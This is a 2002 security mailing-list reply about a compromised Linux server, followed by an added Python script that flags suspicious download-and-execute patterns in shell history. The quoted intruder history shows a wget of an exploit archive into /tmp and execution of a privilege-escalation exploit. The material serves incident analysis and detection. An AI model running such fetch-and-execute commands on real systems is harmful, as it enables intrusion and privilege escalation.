Re: Rooted, .haos on system
From: Carlos Eduardo Pedroza Santiviago (segfault@brturbo.com)
Date: 12/16/02
Date: Mon, 16 Dec 2002 18:31:03 -0200
From: Carlos Eduardo Pedroza Santiviago <segfault@brturbo.com>
To: incidents@securityfocus.com
On Mon, 16 Dec 2002 13:47:28 -0500
Damian Gerow <damian@sentex.net> wrote:
> On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> > On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
> > > I've just received word that one of our customers was rooted, and he's
> > > asking about the file ".haos". Nothing rings any bells, has anyone heard
> > > of it?
> >
> > Just a quick update to this...
>
> And one last tidbit...
>
> Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.
No, for me this looks like:
epc -> ptrace local exploit
su -> su local exploit
They're old ***, and I guess your system wasn't updated.
>
> I've already notified Geocities abuse, and haven't heard back from them
> yet.
>
Good luck,
--
Carlos Eduardo Pedroza Santiviago
<segfault@*NO_SPAM*brturbo.com>
Key id/fp = 4B5EB579/A817 71A3 AA78 1997 65DA 0665 A341 D4A4 4B5E B579
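
A triage check for the pattern in the quoted .bash_history (a download into /tmp followed by running a file by relative path), added here as an example and not part of the original message. The directory list, the fetcher names and the sample history are assumptions constructed for illustration.

```python
import posixpath
import re
import shlex

# Assumption for this example: directories any local user can write to.
WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")
FETCHERS = {"wget", "curl", "fetch", "ftp", "lynx"}

def in_writable(path):
    return any(path == d or path.startswith(d + "/") for d in WORLD_WRITABLE)

def triage_history(text):
    """Return (line_no, tag, command) findings for shell history text."""
    findings = []
    cwd = "~"            # history does not record the starting directory
    fetched_in = set()   # world-writable directories where a download was seen
    for no, line in enumerate(text.splitlines(), 1):
        for cmd in re.split(r";|&&|\|\|", line):
            try:
                argv = shlex.split(cmd)
            except ValueError:       # unbalanced quotes: fall back to split
                argv = cmd.split()
            if not argv:
                continue
            prog = argv[0]
            if prog == "cd":
                target = argv[1] if len(argv) > 1 else "~"
                if target == "-" or target.startswith("~"):
                    cwd = "~"        # home/previous dir: treated as not writable
                else:
                    cwd = posixpath.normpath(posixpath.join(cwd, target))
            elif posixpath.basename(prog) in FETCHERS and in_writable(cwd):
                fetched_in.add(cwd)
                findings.append((no, "download", cmd.strip()))
            elif "/" in prog:
                # A command containing a slash is run by path, not via $PATH.
                full = posixpath.normpath(posixpath.join(cwd, prog))
                if in_writable(full):
                    seen = posixpath.dirname(full) in fetched_in
                    tag = "exec-after-download" if seen else "exec"
                    findings.append((no, tag, cmd.strip()))
    return findings

# Constructed sample modelled on the history quoted in the thread.
SAMPLE = "w\ncd /tmp\nwget http://example.invalid/loc.tgz; tar xvzf loc.tgz\n./epc\n"

if __name__ == "__main__":
    for no, tag, cmd in triage_history(SAMPLE):
        print(f"line {no}: {tag}: {cmd}")
```

History files are user-writable and easily truncated, so an empty result does not clear a host.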